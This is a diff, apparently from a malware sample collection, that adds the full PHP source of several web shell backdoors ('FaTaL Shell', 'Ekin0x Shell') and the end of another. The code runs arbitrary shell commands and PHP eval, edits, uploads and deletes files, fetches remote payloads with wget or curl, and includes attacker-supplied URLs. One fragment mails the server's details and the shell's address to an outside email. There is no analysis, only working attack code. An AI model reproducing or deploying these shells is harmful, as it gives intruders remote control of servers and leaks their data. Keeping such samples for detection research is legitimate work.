} else {
if (@is_readable("$chdir"."$file")) {
echo "<td $color> <a
href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
} else {
echo "<td $color> $file</td>";
}
}
}
echo "<td align=\"right\" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">Del</a>
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\"
onclick=\"Copy('{$chdir}', '{$file}')\">Copy</a> </td>";
} else {
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">Del</a>
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
$OS = @PHP_OS;
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
else { $SafeMode = "<i>$SafeMode</i><BR>"; }
$injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe
Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan
Guna Target Ini.<BR>By: MSN PEBA");
$header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment;
filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
$to = ("arms27@fdfrr.com");
$subject = ("Hajar bos");
mail($to,$subject,$psn,$header);
@include "$bn";
?>
</table>
</fieldset></form>
</div>
</body>
</html>

283
PHP/Backdoor.PHP.Agent.bn Normal file
View File

@ -0,0 +1,283 @@
<?php
session_start();
error_reporting(E_ALL ^ E_NOTICE);
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
@ini_set('max_execution_time',0);
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
$version='version 1.0 by FaTaLErrOr';
$action=$_POST['action'];
$file=$_POST['file'];
$dir=$_POST['dir'];
$content='';
$stdata='';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$lang=array(
'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
'uploadok'=>'Baþarýyla Yüklendi.',
'dircrt'=>'Klasör Oluþturuldu.',
'dontlist'=>'Listelenemiyor Ýzin Yok.',
'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
'dirnf'=>'Dizin Bulunamadi.',
'filenf'=>'.',
'dontwrdir'=>'Sadece Okunabilir.',
'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
'deletefileok'=>'Dosya Silindi.',
'deletedirok'=>'Klasör Silindi.',
'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
'workdir'=>'Çalýþma Dizini: ',
'fullacc'=>'Full Yetki.',
'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
'thisnodir'=>'Klasör Seçin.',
'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
);
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
function test_file($file){
if(!file_exists($file))$err="1";
elseif(!is_file($file)) $err="2";
elseif(!is_readable($file))$err="3";
elseif(!is_writable($file))$err="4"; else $err="5";
return $err;}
function test_dir($dir){
if(!file_exists($dir))$err="1";
elseif(!is_dir($dir)) $err="2";
elseif(!is_readable($dir))$err="3";
elseif(!is_writable($dir))$err="4"; else $err="5";
return $err;}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;}
function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
if(isset($dir)){
$ts['test']=test_dir($dir);
switch($ts['test']){
case 1:$stdata.=$lang['dirnf'];break;
case 2:$stdata.=$lang['thisnodir'];break;
case 3:$stdata.=$lang['dontlist'];break;
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
}else $dir=@chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if(isset($file)){
$ts['test1']=test_file($file);
switch ($ts['test1']){
case 1:$stdata.=$lang['filenf'];break;
case 2:$stdata.=$lang['isdontfile'];break;
case 3:$stdata.=$lang['cantrfile'];break;
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
}
function shell($cmd)
{
global $lang;
$ret = '';
if (!empty($cmd))
{
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
else $ret=$lang['allfuncsh'];
}
return $ret;
}
function createdir($dir){mkdir($dir);}
//delete file
if($action=="delete"){
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//delete dir
if($action=="deletedir"){
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//shell
if($action=="shell"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
<input type=\"submit\" value=\"Uygula\"></form>";}
//editor
if($action=="editor"){
$stdata.="<form method=POST>
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
clearstatcache();
$f=fopen($file, "r");
$contents = fread($f,filesize($file));
fclose($f);
return htmlspecialchars($contents);
}
if(@$_POST['save'])writef($file,$_POST['data']);
if(@$_POST['create'])writef($file,"");
$test=test_file($file);
if($test==1){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
<input type=\"reset\" value=\"No\"></form>";
}
if($test>2){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
}}
//viewer
if($action=="viewer"){
$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
if ($GLOBALS['os']==1) {
$content.="<tr><td>HDD Secin:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
$content.="</td></tr>";
}
$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>';
}
$content.="</table>";
}}}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);}
//phpeval
if($action=="phpeval"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
&lt;?php<br>
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
?><br>
<input type=\"submit\" value=\"Uygula\"></form>";
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
//upload
if($action=="upload"){
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
$form_win="<tr><td><form method=POST enctype=multipart/form-data>
<input type=\"hidden\" name=\"action\" value=\"upload\">
Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
if($os==1)$content.=$form_win;
if($os==0){
$content.=$form_win;
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
<input type=submit name=upload value=Upload></form></td></tr>';
}
if(isset($_POST['uploadloc'])){
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
$uploadfile = $dirupload."/".$_POST['filename'];
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
if(file_exists($uploadfile))$content.=$lang['filext'];
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
$content.=$lang['uploadok'];
}
if(isset($_POST['upload'])){
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
switch($_POST['with'])
{
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
}}}
//end function
?><?=$header;?>
<style type="text/css">
<!--
.style4 {
font-size: x-large;
font-weight: bold;
}
.style5 {color: #FF0000}
.style8 {color: #CCFF00}
-->
</style>
<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
<p>&nbsp;</p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
<span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
<span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
<span class="style8">Durum:</span> <?php echo @$stdata;?></td>
</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>

613
PHP/Backdoor.PHP.Agent.bo Normal file
View File

@ -0,0 +1,613 @@
<?
/*###########################################
Ekin0x Shell volume 2.1
Don't make any changes in c0de except if you dont know php programming
Thanx : VoLqaN | Entrika | Deep Emperor | H-B-V | xoron | AuGuSt27 and all Cyber-warrior.org Memberz
###########################################*/
$a = "http://";
$b = "php-shell.org";
$c = "/x.html";
error_reporting(0);
set_magic_quotes_runtime(0);
if(version_compare(phpversion(), '4.1.0') == -1)
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
else{return $requ."?".$link."=".$val;}}
function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
$nscmd=htmlspecialchars($scmd);print $nscmd;}
elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
print htmlspecialchars($pret);}}
function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";}
elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}
function permcol($path){if (is_writable($path)){print "<font color=red>";
callperms($path); print "</font>";}
elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
callperms($path); print "</font>";}
else {print "<font color=DeepSkyBlue >";callperms($path);}}
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
function download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");
@header("Content-Length: $size");
@header("Content-Disposition: attachment; filename=$dwfile");
@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");
@readfile($dwfile); exit;}
?>
<? include $_GET['baba']; ?>
<html>
<head><title>Ekin0x Shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
</body>
</html>
<?
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
################# Ending of common variables ########################
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ##
</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
print " - <a href='javascript:history.back()'>Geri</a>";
print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
if ($dlink=='phpinfo'){print phpinfo();die();}
print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Izinleri Kontrol Et</a>";
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input ("text","ncbase",$ncbase,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
print "<p><b>[ Url - Decoder ]</b>"; print $sf;
input ("text","nurld",$nurld,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input ("text","nmdf",$nmdf,35);print " ";
input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
print "<pre>";print "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
input ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
input ("text","hlp","",35);print " ";
input ("submit","","Help","");print $ef; die();}
if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
{if (touch ($_REQUEST['indx'])==true){
$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
